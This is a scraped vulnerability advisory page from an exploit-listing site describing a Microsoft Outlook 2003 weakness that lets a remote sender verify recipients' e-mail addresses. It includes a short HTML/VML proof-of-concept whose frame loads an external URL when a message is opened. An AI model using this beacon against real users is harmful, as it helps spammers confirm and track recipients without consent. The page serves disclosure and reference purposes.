Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Microsoft Outlook E-mail Address Verification Weakness - exploit.company
header-logo
Suggest Exploit
vendor:
Outlook
by:
Not mentioned
5.5
CVSS
MEDIUM
E-mail address verification weakness
200
CWE
Product Name: Outlook
Affected Version From: Microsoft Outlook 2003
Affected Version To: Microsoft Outlook 2003
Patch Exists: NO
Related CWE: Not mentioned
CPE: a:microsoft:outlook
Metasploit:
Other Scripts:
Platforms Tested: Windows
Unknown

Microsoft Outlook E-mail Address Verification Weakness

The vulnerability allows a remote attacker to verify the validity of a recipient's e-mail address, potentially leading to an increase in junk e-mail.

Mitigation:

No known mitigation or remediation
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10323/info

It has been reported that Microsoft Outlook mail client may be prone to a weakness that could allow a remote attacker to verify the validity of a recipient's e-mail address. This issue may result in a victim receiving more junk e-mail.

Microsoft Outlook 2003 is reported to be affected by this issue.

<v:vml frame style="LEFT: 50px; WIDTH: 300px; POSITION:
relative; TOP: 30px; HEIGHT: 200px"
src = "http://www.example.com/duh.txt#malware"></v:vmlframe>

<HTML>
<HEAD>
<STYLE>
v\:* { behavior: url(#default#VML); }
</STYLE>
<XML:NAMESPACE NS="urn:schemas-microsoft-com:vml" PREFIX="v"/>
</HEAD>